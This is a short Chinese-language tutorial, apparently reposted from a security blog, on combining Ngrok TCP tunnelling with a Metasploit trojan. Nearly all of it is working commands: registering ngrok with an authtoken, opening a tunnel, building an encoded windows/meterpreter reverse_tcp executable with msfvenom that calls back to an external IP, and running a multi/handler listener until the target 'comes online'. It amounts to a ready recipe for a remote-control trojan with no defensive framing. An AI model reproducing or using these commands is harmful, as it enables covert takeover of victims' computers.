Ngrok内网穿透配合msf木马

来源:互联网 发布:杭州linux运维 编辑:程序博客网 时间:2024/06/03 06:56

Ngrok内网穿透配合msf木马

 

1. Ngrok的安装

原文地址:http://www.ggsec.cn/

Ngrok的下载地址:https://ngrok.com/download

下载对应版本并注册帐号

解压后将其放入 /bin/

ngrok  authtoken 6RBm_2CfWq3xAJ3XVK(6RBm_2CfWq3xAJ3XVK是你注册后给你的)

 

2.tcp内网穿透

Ngrok tcp 2222


3.配置msf马

Ping一下Forwarding的域名,复制ip


生成msf木马

msfvenom -p windows/meterpreter/reverse_tcp-e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=52.15.62.13 LPORT=12545 -f exe >sky.exe

(LHOST填写ping得到的ip;LPORT填写ngrok Forwarding那一行的端口)


4.开启监听

root@kali:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 127.0.0.1

msf exploit(handler) > set LPORT 2222

msf exploit(handler) > exploit


(等目标上线会自动弹出meterpreter)